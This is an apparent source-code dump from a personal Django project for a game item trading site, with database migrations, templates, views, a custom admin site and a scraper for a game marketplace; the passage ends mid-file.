kunkunkun1/myhome | https://github.com/kunkunkun1/myhome | a6d79a4998fd9cdaf450433867c7e98cdd677ac2 | 9f6005418695a6d2096cd393f7a4a55bff2a5109 | cef2542617b9462bd4059d46016312d1763d9e36 | refs/heads/master | 2020-03-29T13:19:28.594085 | 2018-09-30T06:32:15 | 2018-09-30T06:32:15 | 149,952,368 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.49882903695106506,
"alphanum_fraction": 0.5761123895645142,
"avg_line_length": 22.72222137451172,
"blob_id": "a4eb5ebdfc52d294bedc0e13e5852b4c1982ade8",
"content_id": "ab9907d25f3f59f6328d3c722493934c116f1b8d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 431,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 18,
"path": "/dbmodels/migrations/0003_auto_20180917_1906.py",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
"text": "# Generated by Django 2.0.6 on 2018-09-17 11:06\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('dbmodels', '0002_auto_20180917_1902'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='userinfo',\n name='sex',\n field=models.IntegerField(blank=True, choices=[(1, '男'), (2, '女')], null=True),\n ),\n ]\n"
},
{
"alpha_fraction": 0.4959999918937683,
"alphanum_fraction": 0.5786666870117188,
"avg_line_length": 19.83333396911621,
"blob_id": "a9c52c39dc2251cf7c75f5c1c73f324e2db451ef",
"content_id": "2f8a4cb08899fb4b3d729eef758eeb734f0a04cd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 375,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 18,
"path": "/dbmodels/migrations/0005_auto_20180917_1940.py",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
"text": "# Generated by Django 2.0.6 on 2018-09-17 11:40\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('dbmodels', '0004_auto_20180917_1931'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='userinfo',\n old_name='login_account',\n new_name='nikename',\n ),\n ]\n"
},
{
"alpha_fraction": 0.33246752619743347,
"alphanum_fraction": 0.3380952477455139,
"avg_line_length": 35.650794982910156,
"blob_id": "730ef6c592f76ce6a9df4e4c7baafcca3aa90ea6",
"content_id": "4b98920bcadc517433411e4fb8bcd517cab8a988",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 2322,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 63,
"path": "/templates/create.html",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
"text": "{% extends 'base/indexbase.html' %}\n{% load staticfiles %}\n\n{% block title %}\n 增加\n{% endblock %}\n\n\n\n{% block content %}\n\n <div id=\"content-container\">\n <div id=\"page-head\">\n <ol class=\"breadcrumb\">\n <li><a href=\"{% url 'web:index' %}\"><i class=\"demo-pli-home\"></i></a></li>\n <li><a href=\"{% url 'web:transaction_changelist' %}\"><i class=\"pli-open-book\"></i></a></li>\n <li><i class=\"pli-diploma-2\"></i></li>\n </ol>\n </div>\n\n <div>\n <div class=\"col-sm-12\">\n <div class=\"panel\">\n <div class=\"panel-heading\">\n <h3 class=\"panel-title\">新增</h3>\n </div>\n <!--Bordered Table-->\n <!--===================================================-->\n <form class=\"form-horizontal\" method=\"post\">\n {% csrf_token %}\n <div class=\"panel-body\">\n {% for i in form %}\n {{ i.errors.0 }}\n <div class=\"form-group\">\n <label class=\"col-sm-3 control-label\">{{ i.label_tag }}</label>\n <div class=\"col-sm-9\">\n {{ i }}\n </div>\n </div>\n {% endfor %}\n </div>\n <div class=\"panel-footer text-right\">\n <button class=\"btn btn-success\" type=\"submit\">提交</button>\n </div>\n </form>\n </div>\n </div>\n </div>\n\n <div class=\"text-center\">\n <ul class=\"pagination mar-no\">\n <li class=\"disabled\"><a class=\"demo-pli-arrow-left\" href=\"#\"></a></li>\n <li class=\"active\"><a href=\"#\">1</a></li>\n <li><a href=\"#\">2</a></li>\n <li><a href=\"#\">3</a></li>\n <li><a href=\"#\">4</a></li>\n <li><a href=\"#\">5</a></li>\n <li><a class=\"demo-pli-arrow-right\" href=\"#\"></a></li>\n </ul>\n </div>\n </div>\n\n{% endblock %}\n\n"
},
{
"alpha_fraction": 0.4729960262775421,
"alphanum_fraction": 0.5548607110977173,
"avg_line_length": 25.25373077392578,
"blob_id": "be88e3694f1cc2937550c53cb4806f82c174ac22",
"content_id": "14ce8046cdfb40a5c9ec531fd55396c9272487b9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1765,
"license_type": "no_license",
"max_line_length": 136,
"num_lines": 67,
"path": "/utils.py",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
"text": "a = {\n\t\t'iType': '龟丞相',\n\t\t'iHp': 397,\n\t\t'iMp': 244,\n\t\t'iAtt_all': 125,\n\t\t'iDef_All': 176,\n\t\t'iDex_All': 63,\n\t\t'iMagDef_all': 125,\n\t\t'life': 9609,\n\t\t'yuanxiao': 0,\n\t\t'lianshou': 0,\n\t\t'left_qlxl': 7,\n\t\t'iGrade': 29,\n\t\t'iCor_all': 42,\n\t\t'iMag_all': 73,\n\t\t'iStr_all': 49,\n\t\t'iRes_all': 69,\n\t\t'iSpe_all': 78,\n\t\t'iPoint': 0,\n\t\t'grow': 1.049,\n\t\t'ruyidan': 0,\n\t\t'iBaobao': 0,\n\t\t'att': 797,\n\t\t'def': 1308,\n\t\t'hp': 4782,\n\t\t'mp': 1821,\n\t\t'spe': 810,\n\t\t'dod': 881,\n\t\t'qianjinlu': 0,\n\t\t'lx': 0,\n\t\t'pet_icon': 'https://cbg-xyq.res.netease.com/images/pets/small/102064.gif',\n\t\t'genius': 0,\n\t\t'genius_skill': {},\n\t\t'skill_list': [{\n\t\t\t'icon': 'https://cbg-xyq.res.netease.com/images/pet_child_skill/0313.gif',\n\t\t\t'skill_type': '313',\n\t\t\t'level': 1\n\t\t}, {\n\t\t\t'icon': 'https://cbg-xyq.res.netease.com/images/pet_child_skill/0430.gif',\n\t\t\t'skill_type': '430',\n\t\t\t'level': 1\n\t\t}, {\n\t\t\t'icon': 'https://cbg-xyq.res.netease.com/images/pet_child_skill/0332.gif',\n\t\t\t'skill_type': '332',\n\t\t\t'level': 1\n\t\t}, {\n\t\t\t'icon': 'https://cbg-xyq.res.netease.com/images/pet_child_skill/0328.gif',\n\t\t\t'skill_type': '328',\n\t\t\t'level': 1\n\t\t}, {\n\t\t\t'icon': 'https://cbg-xyq.res.netease.com/images/pet_child_skill/0426.gif',\n\t\t\t'skill_type': '426',\n\t\t\t'level': 1\n\t\t}],\n\t\t'all_skill': '313|430|332|328|426',\n\t\t'all_skills': ['313', '430', '332', '328', '426'],\n\t\t'equip_list': [None, None, None],\n\t\t'neidan': []\n\t}\n\nif __name__ == '__main__':\n for key,value in a.items():\n if isinstance(value,str):\n s = \"{key} = models.CharField(verbose_name='',max_length={length},null=True,blank=True)\".format(key=key,length=len(value*2))\n elif isinstance(value,int):\n s = \"{key} = models.IntegerField(verbose_name='',null=True,blank=True)\".format(key=key)\n print(s)\n"
},
{
"alpha_fraction": 0.5921273231506348,
"alphanum_fraction": 0.5946398377418518,
"avg_line_length": 31.2702693939209,
"blob_id": "d54cde69358f860433bd40605d9b29e6a2dd2095",
"content_id": "7db0a3b7f8f2cec18561dfc9c761f564143da424",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1194,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 37,
"path": "/dbmodels/manager.py",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\nclass IndexManager(models.Manager):\n def get_queryset_stat(self):\n return super().get_queryset().filter(stat=1)\n\n\nclass ShowImgManager(IndexManager):\n def get_slider(self):\n return self.get_queryset_stat().filter(img_type=0,\n transcation__stat=1).values(\n 'transcation__img').order_by(\n '-top','-transcation__create_time')\n\n\nclass RightNavManager(IndexManager):\n def get_title(self):\n return self.get_queryset_stat().values('title','icon').order_by('pk')\n\nclass MenuManager(IndexManager):\n def get_menu(self):\n parent_list = self.get_queryset_stat().filter(parent_menu__isnull=True).order_by('pk')\n\n result = []\n for parent in parent_list:\n data = {}\n data['title'] = parent.title\n data['menu'] = list(parent.child.values('id','title','url'))\n\n result.append(data)\n\n return result\n\n\nclass TransactionManager(IndexManager):\n def get_transaction(self,**kwargs):\n return self.get_queryset_stat().filter(**kwargs).values('id','team',).order_by('-create_time')\n"
},
{
"alpha_fraction": 0.5752449035644531,
"alphanum_fraction": 0.6910062432289124,
"avg_line_length": 36.46666717529297,
"blob_id": "f92bfe1ef9cbd11551b2c5356f22fd754f3fc76b",
"content_id": "5de9c08d36bc4d591b28e60fdc987be5028681f3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1123,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 30,
"path": "/spider/__init__.py",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
"text": "from spider.cbgspider import Spider\nfrom spider.parse import Parse\n\nclass Engine:\n def __init__(self, url):\n self.spider = Spider(url)\n self.parse = Parse(self.spider.json_data)\n\n @property\n def get_parse_result(self):\n return self.parse.start_parse()\n\n @property\n def get_html(self):\n return self.spider.html\n\n @property\n def get_base_data(self):\n return self.spider.base_data\n\n\n\nif __name__ == '__main__':\n # engine = Engine(r'https://xyq.cbg.163.com/equip?s=132&eid=201809032000113-132-DUW7DXJNIWED&view_loc=equip_list')\n # engine = Engine(r'https://xyq.cbg.163.com/equip?s=132&eid=201808302200113-132-YX9SVYZXJIRY&view_loc=equip_list')\n # engine = Engine(r'https://xyq.cbg.163.com/equip?s=482&eid=201809132100113-482-7SCLOBWBBM3W&view_loc=equip_list')\n # engine = Engine(r'https://xyq.cbg.163.com/equip?s=482&eid=201808062200113-482-Y6CGKXZDUSER&view_loc=equip_list')\n engine = Engine(r'https://xyq.cbg.163.com/equip?s=416&eid=201809211700113-416-T22Y7XWOX35C&view_loc=equip_list')\n print(engine.get_parse_result)\n print(engine.get_base_data)"
},
{
"alpha_fraction": 0.6196156144142151,
"alphanum_fraction": 0.6229290962219238,
"avg_line_length": 31.826086044311523,
"blob_id": "d39bad53947341dfda8d2d701ba10d18971aff54",
"content_id": "f8f1628a60daa7d40c15becd494ce34646abe1ae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1509,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 46,
"path": "/web/templatetags/filter.py",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
"text": "from django import template\nfrom django.contrib.admin.templatetags.admin_list import result_headers, result_hidden_fields, results\nfrom django.template.defaultfilters import stringfilter\nfrom django.utils.safestring import mark_safe\n\nregister = template.Library()\n\n\[email protected](name='to_url')\n@stringfilter\ndef to_url(value):\n return value + '/'\n\n\[email protected]_tag(\"base/my_chang_list.html\")\ndef my_result_list(cl):\n headers = list(result_headers(cl))\n num_sorted_fields = 0\n for h in headers:\n if h['sortable'] and h['sorted']:\n num_sorted_fields += 1\n\n rl = list(results(cl))\n for i in range(len(rl)):\n for j in range(1,len(rl[i])):\n rl[i][j] = mark_safe(rl[i][j].replace(\n '<a ','<a class=\"btn-link\" ').replace(\n '<th class=\"','<th style=\"vertical-align:middle\" class=\"text-center ').replace(\n '<td class=\"','<td style=\"vertical-align:middle\" class=\"')\n )\n\n return {'cl': cl,\n 'result_hidden_fields': list(result_hidden_fields(cl)),\n 'result_headers': headers,\n 'num_sorted_fields': num_sorted_fields,\n 'results': rl,}\n\n\[email protected]_tag('base/my_actions.html', takes_context=True)\ndef my_admin_actions(context):\n \"\"\"\n Track the number of times the action field has been rendered on the page,\n so we know which value to use.\n \"\"\"\n context['action_index'] = context.get('action_index', -1) + 1\n return context"
},
{
"alpha_fraction": 0.5132924318313599,
"alphanum_fraction": 0.5531697273254395,
"avg_line_length": 33.92856979370117,
"blob_id": "9c926ea68099ddfdfc9b3764b84bb75c1a7e8092",
"content_id": "977ffc8a841d9b37de49e092a11d44d5899e7ab5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 994,
"license_type": "no_license",
"max_line_length": 139,
"num_lines": 28,
"path": "/dbmodels/migrations/0011_menu.py",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
"text": "# Generated by Django 2.0.6 on 2018-09-18 04:47\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('dbmodels', '0010_auto_20180918_0842'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Menu',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('title', models.CharField(max_length=10)),\n ('url', models.CharField(blank=True, max_length=100, null=True)),\n ('stat', models.IntegerField(choices=[(0, '下架'), (1, '上架')], default=1)),\n ('parent_menu', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='dbmodels.Menu')),\n ],\n options={\n 'verbose_name': '菜单',\n 'verbose_name_plural': '菜单',\n },\n ),\n ]\n"
},
{
"alpha_fraction": 0.5025773048400879,
"alphanum_fraction": 0.5876288414001465,
"avg_line_length": 20.55555534362793,
"blob_id": "6b1b4118b5fda196e891cf2b0cd6ac9807380b36",
"content_id": "f8fb35cd40ad45fe633a36944775844fe22a0dfd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 388,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 18,
"path": "/dbmodels/migrations/0009_auto_20180918_0835.py",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
"text": "# Generated by Django 2.0.6 on 2018-09-18 00:35\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('dbmodels', '0008_auto_20180918_0816'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='rightnav',\n name='title',\n field=models.CharField(max_length=10),\n ),\n ]\n"
},
{
"alpha_fraction": 0.4783625602722168,
"alphanum_fraction": 0.5274853706359863,
"avg_line_length": 31.884614944458008,
"blob_id": "0a67e8b88067396b7fe624c5b06747f41f58a2af",
"content_id": "3e16c49fdcc32605c39b16165a2f479b0c8d5906",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 911,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 26,
"path": "/dbmodels/migrations/0008_auto_20180918_0816.py",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
"text": "# Generated by Django 2.0.6 on 2018-09-18 00:16\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('dbmodels', '0007_auto_20180917_2236'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='RightNav',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('title', models.IntegerField(choices=[(0, '梦幻论坛'), (1, '梦幻工具'), (2, '五开概览'), (3, '梦幻金价'), (4, '梦幻其他')])),\n ('stat', models.IntegerField(choices=[(0, '下架'), (1, '上架')], default=1)),\n ],\n ),\n migrations.AddField(\n model_name='transaction',\n name='stat',\n field=models.IntegerField(choices=[(0, '售出'), (1, '上架')], default=1),\n ),\n ]\n"
},
{
"alpha_fraction": 0.6024680733680725,
"alphanum_fraction": 0.6055530905723572,
"avg_line_length": 26.658536911010742,
"blob_id": "349bbb509cd7fe7c9523469bfb96ec2853d4df2f",
"content_id": "8d06536a323882ea7beb75e89df5f73163d60c61",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2277,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 82,
"path": "/web/views.py",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render, redirect,HttpResponse\nfrom django.views import View\n\nfrom dbmodels.models import ShowImg, RightNav, Menu, Transaction\nfrom django.contrib.auth import authenticate, login as lgi, logout as lgt\nimport functools\n\n# Create your views here.\ndef index(request):\n # 返回图片\n\n slider = ShowImg.objects.get_slider()\n right_nav = RightNav.objects.get_title()\n if request.session.get('menu') is None:\n menu = Menu.objects.get_menu()\n request.session['menu'] = menu\n\n return render(request, 'index.html', {'slider': slider,\n 'right_nav': right_nav,\n })\n\n\ndef login(request):\n if request.method == 'POST':\n username = request.POST['username']\n password = request.POST['password']\n rember = request.POST.get('rember')\n\n user = authenticate(request, username=username, password=password)\n if user is not None:\n lgi(request, user)\n if not rember:\n request.session.set_expiry(0)\n return redirect('web:index')\n\n return render(request, 'login.html')\n\n\ndef logout(request):\n lgt(request)\n return redirect('web:login')\n\ndef transaction_deal(func):\n @functools.wraps(func)\n def warp(*args,**kwargs):\n new_kwargs = {}\n for i,j in kwargs.items():\n if j:\n new_kwargs[i] = int(j[:-1])\n\n args = args + (1,) if new_kwargs.get('pk') else args + (0,)\n\n result = func(*args,**new_kwargs)\n return result\n return warp\n\n\n@transaction_deal\ndef transaction(request,*args,**kwargs):\n if request.method == 'GET' and not args[-1]:\n result_list = Transaction.objects.get_transaction(**kwargs)\n return render(request, 'list.html', {\n 'result_list': result_list,\n })\n else:\n pass\n\n\n\n\ndef user(request):\n # data = Transaction.objects.all()\n\n from django.http import JsonResponse\n # from django.core import serializers\n #\n # data1 = serializers.serialize('json',data)\n # print(data1)\n # print(Transaction.objects.values())\n result = JsonResponse(list(Transaction.objects.values()),safe=False)\n print(result)\n return result\n\n"
},
{
"alpha_fraction": 0.5735849142074585,
"alphanum_fraction": 0.6339622735977173,
"avg_line_length": 25.5,
"blob_id": "5dafb938f560efebad70a1178b18571599a71d3e",
"content_id": "9aba4e0085bda55a1c5b6bdcb1c607b7210c9887",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 530,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 20,
"path": "/dbmodels/migrations/0014_rolebase_transaction.py",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
"text": "# Generated by Django 2.0.6 on 2018-09-20 04:29\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('dbmodels', '0013_auto_20180920_1221'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='rolebase',\n name='transaction',\n field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='dbmodels.Transaction'),\n preserve_default=False,\n ),\n ]\n"
},
{
"alpha_fraction": 0.5959905982017517,
"alphanum_fraction": 0.5969111323356628,
"avg_line_length": 29.08307647705078,
"blob_id": "dc6ec7600863332cc306cdcbb96719706f08608b",
"content_id": "cdc57de890d24da6b99ece9c61b991d9d7c4b726",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9839,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 325,
"path": "/web/sites.py",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
"text": "from collections import OrderedDict\n\nfrom django.contrib.admin import ModelAdmin\nfrom django.contrib.admin.sites import AlreadyRegistered, AdminSite\nfrom django.contrib.admin.templatetags.admin_list import _coerce_field_name\nfrom django.contrib.admin.utils import label_for_field, quote\nfrom django.core.exceptions import FieldDoesNotExist\nfrom django.db.models.expressions import OrderBy, F\nfrom django.utils.http import urlencode\nfrom django.utils.safestring import mark_safe\nfrom django.views.decorators.cache import never_cache\nfrom django.shortcuts import render, redirect, reverse\nfrom django.contrib.auth import authenticate, login as lgi, logout as lgt\nfrom django.views.generic import View, ListView, DetailView, CreateView, UpdateView, DeleteView\nimport importlib\nfrom dbmodels.models import ShowImg, RightNav, Menu, Transaction\nfrom django.utils.html import format_html\n\n\n\n\n\n\nclass MyModelAdmin(ModelAdmin):\n list_template_name = \"list.html\"\n detail_template_name = \"detail.html\"\n create_template_name = \"create.html\"\n update_template_name = \"create.html\"\n delete_template_name = None\n\n\n\n def get_urls(self):\n from django.urls import path\n\n info = self.opts.model_name\n\n urlpatterns = [\n path('', self.changelist_view, name='%s_changelist' % info),\n path('add/', self.add_view, name='%s_add' % info),\n path('<path:object_id>/delete/', self.delete_view, name='%s_delete' % info),\n path('<path:object_id>/change/', self.change_view, name='%s_change' % info),\n path('<path:object_id>/detail/', self.detail_view, name='%s_detail' % info),\n ]\n return urlpatterns\n\n @property\n def urls(self):\n return self.get_urls()\n\n def _get_view_cls(self, method, extra_pro=None):\n cls_name = '%s%sView' % (self.opts.model_name, method)\n\n module = importlib.import_module('django.views.generic')\n father_cls = getattr(module, '%sView' % method.capitalize())\n\n cls_pro = {\n 'template_name': getattr(self, '%s_template_name' % method),\n 'model': self.model,\n }\n cls_pro.update(extra_pro or {})\n\n cls = type(cls_name, (father_cls,), cls_pro)\n return cls\n\n def _has_extra_pro_method(self, method,extra_context = None):\n '''返回额外的类属性和方法'''\n m = '%s_extra_pro' % method\n extra_context = extra_context or {}\n if hasattr(self, m):\n d = getattr(self, m)()\n d.update({'extra_context':extra_context})\n return d\n\n def changelist_view(self, request,extra_context=None):\n template_response = super(MyModelAdmin,self).changelist_view(request,extra_context)\n\n cl = template_response.context_data['cl']\n def url_for_result(cl, result):\n pk = getattr(result, cl.pk_attname)\n return reverse('web:%s_change' % cl.opts.model_name,\n args=(quote(pk),),\n current_app=cl.model_admin.admin_site.name)\n\n from functools import partial\n cl.url_for_result = partial(url_for_result,cl)\n\n method = 'list'\n\n extra_pro = self._has_extra_pro_method(method,template_response.context_data)\n\n cls = self._get_view_cls(method, extra_pro)\n\n return cls.as_view()(request)\n\n def add_view(self, request, form_url='', extra_context=None):\n method = 'create'\n\n extra_pro = self._has_extra_pro_method(method)\n\n cls = self._get_view_cls(method, extra_pro)\n\n return cls.as_view()(request)\n\n def change_view(self, request, object_id,form_url='', extra_context=None ):\n method = 'update'\n\n kwargs = {'pk': object_id}\n\n extra_pro = self._has_extra_pro_method(method)\n\n cls = self._get_view_cls(method, extra_pro)\n return cls.as_view()(request, **kwargs)\n\n def delete_view(self, request, object_id, extra_context=None):\n method = 'delete'\n\n kwargs = {'pk': object_id}\n\n extra_pro = self._has_extra_pro_method(method)\n\n cls = self._get_view_cls(method, extra_pro)\n return cls.as_view()(request, **kwargs)\n\n def detail_view(self, request, object_id, ):\n method = 'detail'\n\n kwargs = {'pk': object_id}\n\n extra_pro = self._has_extra_pro_method(method)\n\n cls = self._get_view_cls(method, extra_pro)\n return cls.as_view()(request, **kwargs)\n\n\n\n\n\nclass WebSite(AdminSite):\n\n def get_urls(self):\n from django.urls import include, path\n\n urlpatterns = [\n path('', self.index, name='index'),\n path('login/', self.login, name='login'),\n path('logout/', self.logout, name='logout'),\n path('jsi18n/', self.i18n_javascript, name='jsi18n'),\n ]\n\n for model, model_admin in self._registry.items():\n urlpatterns += [\n path('%s/' % (model._meta.model_name), include(model_admin.urls)),\n ]\n\n return urlpatterns\n\n @property\n def urls(self):\n return self.get_urls(), 'web', self.name\n\n @never_cache\n def index(self, request, extra_context=None):\n\n slider = ShowImg.objects.get_slider()\n right_nav = RightNav.objects.get_title()\n if request.session.get('menu') is None:\n menu = Menu.objects.get_menu()\n request.session['menu'] = menu\n\n context = {'slider': slider,\n 'right_nav': right_nav}\n\n context.update(extra_context or {})\n\n return render(request, 'index.html', context)\n\n @never_cache\n def logout(self, request):\n lgt(request)\n return redirect('web:login')\n\n @never_cache\n def login(self, request,):\n return LoginView.as_view()(request)\n\n\nclass LoginView(View):\n def valid_user(self, request):\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(request, username=username, password=password)\n return user\n\n def post(self, request, *args, **kwargs):\n user = self.valid_user(request)\n if user is not None:\n lgi(request, user)\n rember = request.POST.get('rember')\n if not rember:\n request.session.set_expiry(0)\n return redirect('web:index')\n self.get(request, *args, **kwargs)\n\n def get(self, request, *args, **kwargs):\n return render(request, 'login.html')\n\n\nclass ChangeListView(ListView):\n template_name = \"list.html\"\n model = Transaction\n ordering = ('-create_time')\n context_object_name = 'result_list'\n\n\nclass WebDetailView(DetailView):\n template_name = \"detail.html\"\n model = Transaction\n\n\nclass AddView(CreateView):\n template_name = \"create.html\"\n model = Transaction\n fields = '__all__'\n\n # success_url = reverse\n def get_success_url(self):\n return reverse('web:transaction_changelist')\n\n extra_context = None\n def get_context_data(self):\n pass\n\n\nclass WebUpdateView(UpdateView):\n template_name = \"create.html\"\n model = Transaction\n fields = '__all__'\n\n def get_success_url(self):\n return reverse('web:transaction_changelist')\n\n\nclass WebDeleteView(DeleteView):\n model = Transaction\n\n def get(self, request, *args, **kwargs):\n return self.post(request, *args, **kwargs)\n\n def get_success_url(self):\n return reverse('web:transaction_changelist')\n\n\nclass TModelAdmin(MyModelAdmin):\n list_display = ('__str__', 'team', 'img', 'stat', 'user','get_btn')\n list_editable = ('team', 'img', 'stat', 'user',)\n\n def get_btn(self,obj):\n s = ''' <a href=\"{}\" class=\"btn-link\">\n <span class=\"label label-info\">查看</span>\n </a>\n <a href=\"{}\" class=\"btn-link\">\n <span class=\"label label-success\">修改</span>\n </a>\n <a href=\"{}\" class=\"btn-link\">\n <span class=\"label label-warning\">删除</span>\n </a>'''\n return format_html(\n s,\n reverse('web:transaction_detail',args=(obj.pk,)),\n reverse('web:transaction_change',args=(obj.pk,)),\n reverse('web:transaction_delete',args=(obj.pk,)),\n\n )\n get_btn.short_description = '操作'\n\n def list_extra_pro(self):\n return {# 'context_object_name': 'result_list',\n #'extra_context': self.get_list_extra_context,\n }\n\n def create_extra_pro(self):\n return {'get_success_url': self.get_success_url,\n 'fields': '__all__',\n 'extra_context':self.get_create_extra_context,\n }\n\n def update_extra_pro(self):\n return {'get_success_url': self.get_success_url,\n 'fields': '__all__',}\n\n def delete_extra_pro(self):\n return {'get_success_url': self.get_success_url,\n 'get': self.get}\n\n @staticmethod\n def get_success_url(self):\n return reverse('web:transaction_changelist')\n\n @staticmethod\n def get(self, request, *args, **kwargs):\n return getattr(self, 'post')(request, *args, **kwargs)\n\n @property\n def get_uptdate_fields(self):\n fields = '__all__'\n return fields\n\n @property\n def get_create_fields(self):\n fields = '__all__'\n return fields\n\n @property\n def get_create_extra_context(self):\n '''add_view 展示的页面的context'''\n return {'s1':'5'}\n\n # @property\n # def get_list_extra_context(self):\n # '''add_view 展示的页面的context'''\n # from django.contrib.admin.templatetags import admin_list\n # return {'result_list_ccc':admin_list.result_list(self.cl)}\nsite = WebSite(name='web')\nsite.register(Transaction, TModelAdmin)\n"
},
{
"alpha_fraction": 0.5183374285697937,
"alphanum_fraction": 0.5990220308303833,
"avg_line_length": 21.72222137451172,
"blob_id": "cb9c51f003f8010229e10778e93c3a31bb9c62ac",
"content_id": "051043121ed29c3cd9d3b43557f54810e658e101",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 409,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 18,
"path": "/dbmodels/migrations/0004_auto_20180917_1931.py",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
"text": "# Generated by Django 2.0.6 on 2018-09-17 11:31\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('dbmodels', '0003_auto_20180917_1906'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='userinfo',\n name='login_account',\n field=models.CharField(max_length=64, unique=True),\n ),\n ]\n"
},
{
"alpha_fraction": 0.5303429961204529,
"alphanum_fraction": 0.5546174049377441,
"avg_line_length": 31.672412872314453,
"blob_id": "a48bf2da9cb97a3423d72fcf6f75a91d30704596",
"content_id": "c38dbe456d176808eac4a7ec9d64e95df5024c31",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1947,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 58,
"path": "/dbmodels/migrations/0007_auto_20180917_2236.py",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
"text": "# Generated by Django 2.0.6 on 2018-09-17 14:36\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('dbmodels', '0006_auto_20180917_1952'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='showimg',\n options={'verbose_name': '首页图片', 'verbose_name_plural': '首页图片'},\n ),\n migrations.AlterModelOptions(\n name='transaction',\n options={'verbose_name': '交易帖子', 'verbose_name_plural': '交易帖子'},\n ),\n migrations.RemoveField(\n model_name='showimg',\n name='create_time',\n ),\n migrations.RemoveField(\n model_name='showimg',\n name='img',\n ),\n migrations.AddField(\n model_name='showimg',\n name='transcation',\n field=models.OneToOneField(default=20180917, on_delete=django.db.models.deletion.CASCADE, to='dbmodels.Transaction'),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='transaction',\n name='create_time',\n field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='transaction',\n name='img',\n field=models.ImageField(blank=True, null=True, upload_to='indeximg'),\n ),\n migrations.AlterField(\n model_name='showimg',\n name='img_type',\n field=models.IntegerField(choices=[(0, '轮播'), (1, '最热'), (2, '最新')], default=3),\n ),\n migrations.AlterField(\n model_name='showimg',\n name='stat',\n field=models.IntegerField(choices=[(0, '下架'), (1, '上架')], default=1),\n ),\n 